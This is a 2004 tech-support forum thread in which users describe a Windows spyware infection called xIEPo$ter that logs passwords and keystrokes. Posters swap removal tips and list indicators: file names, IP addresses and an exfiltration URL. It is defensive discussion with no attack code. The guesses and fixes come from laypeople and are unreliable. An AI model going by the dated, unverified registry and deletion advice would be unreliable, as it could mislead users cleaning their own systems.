xIEPo$ter? Please help!

Fizban1 · Cadet Joined: Apr 14, 2004 Posts: 4 Location: USA

thank you tony, i like veil have been havin this xiepo$ter junk, thanks to your post on how to fix it im free from its grasp, i wish to thank you from the bottom of my heart =D

xiepo$ter would increase in numbers btw as long as your comp was running, ive gotten up to 12 of it doin this.

thank you again tony, i am glad i stumbled accross this post while looking for ways to fix this =D

*edit* sigh, seems to be another one like it, but this one comes up with random letters each time =(

*edit again*, it also keeps changing homepage to about:blank

Fizban1 · Cadet Joined: Apr 14, 2004 Posts: 4 Location: USA

fix didnt work, lil buggers still there =(, plus theres this file called cjagnj, said it was created april 12, 2004, cept no program we have uses it, try to run a virus scan, crashes desktop, try to delete it, says windows is using it, try moving it, same thing windows using it, using windows 95 2nd edition.

the thing veil mentioned keeps commin up as 2 different things, xiepo$ter, and some random letters scrambled together, tried what you mentioned and for this computer it sadly didnt work =(, cant find anything remotely close to where it is hidden, whoever created this little devil did a good job =(, done its job to anger me severely

any help would be greatly appreciated and you will have my heartfelt thankyou

War1980 · Cadet Joined: Apr 15, 2004 Posts: 1 Location: USA

I followed the steps to remove the xiepo$ter, and it worked. Like the original poster, i was having an application that was having to be forcibly closed, Lbjlck32.exe.

After taking the steps outlined, i am able to delete/move the Lbjlck32.exe out from c:\windows\system32 and the xiepo$ter no longer load on start up.

If you would like a copy of these files or any logs, i would be glad to supply them.

This was the second toughest issue ive had to deal with, Newdot.net being the biggest pain in the ass ive ever dealt with.

Fizban1 · Cadet Joined: Apr 14, 2004 Posts: 4 Location: USA

*edit* thanks to a friend i learned how to scan my registry files and delete the nasties in there, he also taught me how to delete stuff in dos that cant be deleted when your in windows, so all in all, problem solved,

average it came up every 15-30 minutes, been an hour and xiepo$ter free! =D

thanks tony for the fix, im not sure which thing did it, your fix or the tampering with the nasty registry files, either way, heres the heartfelt thank you i mentioned in my first post,

thank you from the bottom of my heart

MikeCC · Cadet Joined: Apr 14, 2004 Posts: 1 Location: USA

First, let me thank all of those who contributed to this thread...and especially the man with the cure!! I had bever been to this site before, a Google search for xIEPo$ter brought me here...

I had xIEPo$ter on my Windows 2000 laptop...and the regedit fix got rid of it...

I didnt experince the unclosable application part of it...so Im going to look for those files to see if they may be lurking.

Thanks again

Mike

onceoffhelp · Cadet Joined: Apr 16, 2004 Posts: 1 Location: Uk

Hi I have just looked at my parents machine which has the same xiepo$ter1 and xiepo$ter2 problem. Its running XP with SP1. There was also a problem i found with a another that seemed to be linked called x-okrecv (and then a number at the end).

I noticed that when XP shutdown it said it was ending a task called HJOFJDEI.EXE which didn't sound like a microsoft file. I have not been able to delete this file however i managed to rename to a.aaa.

Since I have done this the machine has worked fine and the htm files have stopped loading.

Hope this helps

(sorry i can't remember where HJOFJDEI.exe was located however i am sure you can search for it)

Fizban1 · Cadet Joined: Apr 14, 2004 Posts: 4 Location: USA

hmm, it would seem whenever xiepo$ter ends up on your computer the parent file is different each time, for me i had cmbdl32 and another thing like xiepo$ter with random letters had the parent file cjagnj, so i guess its different whenever it ends up on your comp

Shuttie · Cadet Joined: Apr 18, 2004 Posts: 5 Location: Belgium

What seems to happen is this

1/ A program creates a temporary htm document, in your c:\windows temp directory.
2/ This creates a file called xIEPo$terx.htm under "My Computer"
(the x increments by one every 10 minutes)
3/ this document runs itself to create another file with the name "X-okRecv11" and sends it to ip address 65.75.157.147 / 65.75.157.140

It does this every 10 minutes.

I guess it is telling somone you are on-line ?

Who is at IP 167.75.157.147 ?

I had to do all three activities advised, but it has been sometime before it last hapened - so thanks very much to all !!!

**EDIT** grrr 10 minutes later it started again !!!
Any ideas ?

I have sent all relevant files to you.

Thanks Very Much in advance !

Shuttie · Cadet Joined: Apr 18, 2004 Posts: 5 Location: Belgium

I have tried Adware, and SpyBot.

Both cleared out a lot of bad files.

But whilst it does not seem to send the file on the internet, it does still create the temporary files.

Any idea's ?

Shuttie · Cadet Joined: Apr 18, 2004 Posts: 5 Location: Belgium

I have tried Adware, and SpyBot.

Both cleared out a lot of bad files.

But whilst it does not seem to send the file on the internet, it does still create the temporary files.

Any idea's ?

Shuttie · Cadet Joined: Apr 18, 2004 Posts: 5 Location: Belgium

** Update 20/04/04 - 18:50 Central European Time

I dont know what finally did it, but I updated the spybot program, and adware.

One of them must have cleaed it, as it hasnt returned for 24 hours Laughing

netscorp · Cadet Joined: Apr 20, 2004 Posts: 1 Location: USA

Thank heavens that you guys (and gals) are out there. i have been fighting this thing all day and have been unable to find anything on this problem until I stumbled upon the posts on this site.
I have run a couple of spyware programs but that doesn't seem to fix it. How can I remidy this? any ideas?

Thanks

jimmy_w18 · Cadet Joined: Apr 21, 2004 Posts: 1 Location: Australia

Hi Guys and Girls, a quick run down on what I have found on my system regarding the xIEPo$ter annoyance. It get real interesting down the bottom of this post.....

I have 255 instances of the xIEPo$ter???.htm file in my 'My Computer' folder which have been created at 10 or 20 minute intervals, and one log file on the desktop which I have already deleted so I cant comment on it. These each have code linking to files in my 'Temp' directory with all sorts of names like 'qklcaocc.htm'. These files have html code in them posting data to 'http://ussrforeva.com/ppslog.php'.

Also there are two files in my 'system32' folder, one named 'Mimfaihb.exe' and the other 'Dbdoja32.dll' which I am sure are related to this problem. They were both created on the same date at the same time. The file 'Dbdoja32.dll' also had its own registery entry.

Now for the interesting thing!!!!!

In the 'system32' folder I also fould two .dat files called 'tt32.dat' and 'clctk.dat' which contained MY unames, passwords to websites, ebay passwords and tracking, all sorts of info on websites I have been to, keystroke recordings (by the looks of it), all sorts of stuff you dont really want other people to have!!!

So im guessing that when they send to the IP someone has already meantioned, they are not checking to see if you are online, but are recieving all our password and data that has been collected in these files. Please someone tell me that im wrong!

If anyone can find a way to completely kill this thing I will be greatful, I will also post anything else I fine here.

Later guys........

Shuttie · Cadet Joined: Apr 18, 2004 Posts: 5 Location: Belgium

I cant say which one of these actions fixed the problem, but this is what I did....

a) I downloaded the "Hyjack This" file from http://computercops.biz/downloads-cat-14.html

b) Ran CWSchreddrer http://computercops.biz/downloads-cat-14.html

c) Copied the contents of the Quote box to Notepad, and saved as Remove.reg (save as type: 'all files' )
Doubleclick Remove.reg, and answer yes when asked to have its contents added to the Registry.(see quote below)

d) I then downloaded and ran "Adware" (I also updated the latest data file)
http://computercops.biz/downloads-cat-14.html

e) And I downloaded and ran "Spybot" (again using latest data file)

After re-booting the machine, it seems to have stopped.
I dont know which one finally fixed it, but I would do everything just in case, especially if there is a chance of it copying your key strokes.

Hope that works for you !

OpaOpa · Cadet Joined: Apr 26, 2004 Posts: 1 Location: Brazil

I'm having the same problem with xPo$terxx.htm. When I'm running some game or anything that requires fullscreen, from time to time, it suddenly minimizes. When I press CTRL+ALT+DEL, there's an "Iexplore" running. It always appears.

Anyway, I checked what jimmy_w18 said about the password files... and I found them. Not the same filenames though. On my /SYSTEM folder, there's this file named glumx32.dat, which updates from time to time. I opened it with the NOTEPAD, and found every uname and password I ever used since I first connected. Stuff I don't even remembered, that I used years ago and probably doesn't even work was there. It's last entry was the uname to this forum, and it updated right after I registered. It's even got my last Google searches...

Yeah, that freaked me out.


	Home ˇ Topics ˇ Submit News ˇ Top 10 This entire site, Cops Themes, and Computer Cops are Š 2002 - 2004 Computer Cops, LLC. All rights reserved. You can syndicate our news using the file RSS 0.91, ultramode.txt, or RSS 1.0. Acceptable Use Policy. Use signifies your agreement. Engine Copyright Š 2002 by PHP-Nuke, GNU/GPL Licensed. ICRA Member. Paul Laudanski, Member of Computer Cops, LLC Server Load: 773 pages served in previous 5 minutes. Page Generation: 5.504 seconds.